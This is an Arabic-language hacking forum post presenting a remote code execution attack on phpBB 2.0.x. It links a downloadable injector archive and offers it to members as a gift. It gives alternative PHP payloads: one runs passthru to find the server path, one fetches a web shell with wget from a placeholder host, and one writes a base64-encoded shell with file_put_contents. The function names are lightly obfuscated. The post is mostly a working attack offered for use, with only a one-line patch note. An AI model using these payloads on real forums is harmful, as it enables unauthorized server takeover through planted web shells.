:: vBspiders Professional Network :: - [فيديو] استغلال قاعدة بيانات phpbb ورفع شل

اسم الثغرة : Remote Code Execution
الخطوة : High
الاصدارات : phpbb = 2.0.x
الترقيع : ترقية النسخة لآخر اصدار + تعطيل دوال التنفيذ

سمعت عن طرق سابقة شبيهة ولكن الأساليب تختلف ويفضل ان الواحد يطلع ع أكبر قدر من اساليب الوصول لثغرة معينة لأن الواحد مايضمن حالة واحدة مع كل المواقع اللي تواجهه

التطبيق
http://forum.unknown-heroes.com/file...--InjEctOr.rar

هدية خاصة للعناكب..

بدائل عن ماحقن بالتطبيق :

كود PHP:

   passthr.u('pwd') // كأول مرة, للتعرف ع المسار

passthr.u('wget site.com/shell.php -O /path/shell.php')  // لسحب الشل ع هالمسار

طريقة ثانية :
ممكن انشاء ملف وحقن كود الشل مباشرة فيه :

كود PHP:

   file_put_conten.ts('/path/shell.php',base.64_decode('encode shell here'));

والطريق كثيرة تحتاج منك فقط للتعرف ع php ودوالها

اللي يبي يتعرف ع الدوال لا يسأل هنا, يروح ع الموقع php.net ويبحث

ThE End

Bay Bay ... $ee y0u